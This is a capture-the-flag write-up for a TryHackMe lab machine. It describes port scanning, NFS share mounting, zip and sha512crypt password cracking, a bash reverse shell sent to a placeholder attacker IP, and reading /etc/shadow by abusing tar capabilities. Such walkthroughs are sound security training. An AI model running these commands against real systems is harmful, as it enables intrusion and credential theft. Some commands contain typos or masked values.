The Server From Hell (THM) - Write-up

 

The Server From Hell is a machine from TryHackMe that was rated as medium dificulty. I must say that this one was a fun box where I've learned a lot of things.

Now, we start as always with an nmap scan.

Command: nmap $IP

The nmap result showed me that there are 30.000 open ports. Now this is not good. If we take a look on the box page on THM, the creator of the box left us a message.

I think that is a good idea 😁, let's see what is on port 1337. 

Hmm, this is weird, it says that the connection was reset, let's see what BurpSuite says.

OK, we have to find the troll face. And to do that we need to a banner grabbing.

Command: nc $IP 1-100 -v

Now we got something, let's use nc again to check the banner.

Command: nc $IP 1**** -v 

Let's check to see what share are available.

Command: sudo showmount -e $IP

Now let's mount those shares.

Command: sudo mount -t $IP:/home/*** /mnt/nfs

Just a .zip file. A tried to extract the content of it, but looks like is password protected, so I used a tool called fcrackzip to crack the password.

Command: fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' backup.zip

Note: you can use JtR to crack the password aswell.

File content extracted from the zip archive

I tried to use the id_rsa key to connect to the machine via SSH but I couldn't do it because port 22 was not used for SSH. There is a hint in there that could mean only one thing....finding the SSH port.

To do that I had to use netcat again to grab the banner.

Command 1: while true ; do ssh -i id_rsa hades@$IP -p `shuf -i 2500-4500 -n 1` ; done

or

Command 2: nc $IP 2500-4500 | grep SSH

Note: I would recommend the first command because is way faster.

As we can see from the image below, this is not an ordinary shell.

I did some research and I found that this is a ruby interactive shell, and if we use the system "our bash command" we can execute normal commands.

The next step for me was to get a proper shell, and I did that by calling a reverse shell

Command: system "bash -c '/bin/bash -i >& /dev/tcp/ATTACKER IP/PORT 0<&1'"

I used linpeas to find the interesting stuff on the machine, and one thing stood out to me, tar capabilities.

This means that we can archive any file we want, then extract it and read it. So that's that I did, I used tar to read the /etc/shadow file.

First archive the file:

Command: tar cvf shadow.tar /etc/shadow

Second extract the file

Command: tar -xvf shadow.tar

And third read the content of the file

Command: tail -8 shadow

Let's crack vagrant's password, which is a sha512crypt hash. For that I used hashcat on windows because cracking hashes on VMs is nit recomanded.

Command: hahscat -m 1800 hash rockyou.txt

😐😐😐😐😐OK, interesting password!

Now that we can login as user vagrant let's check his privileges by running sudo -l.

😐😐😐😐😐 Interesting, again! Let's get a root shell

Now we can easily get a root shell and read both flags, user and root flag, because the first flag is in the nfs share directory.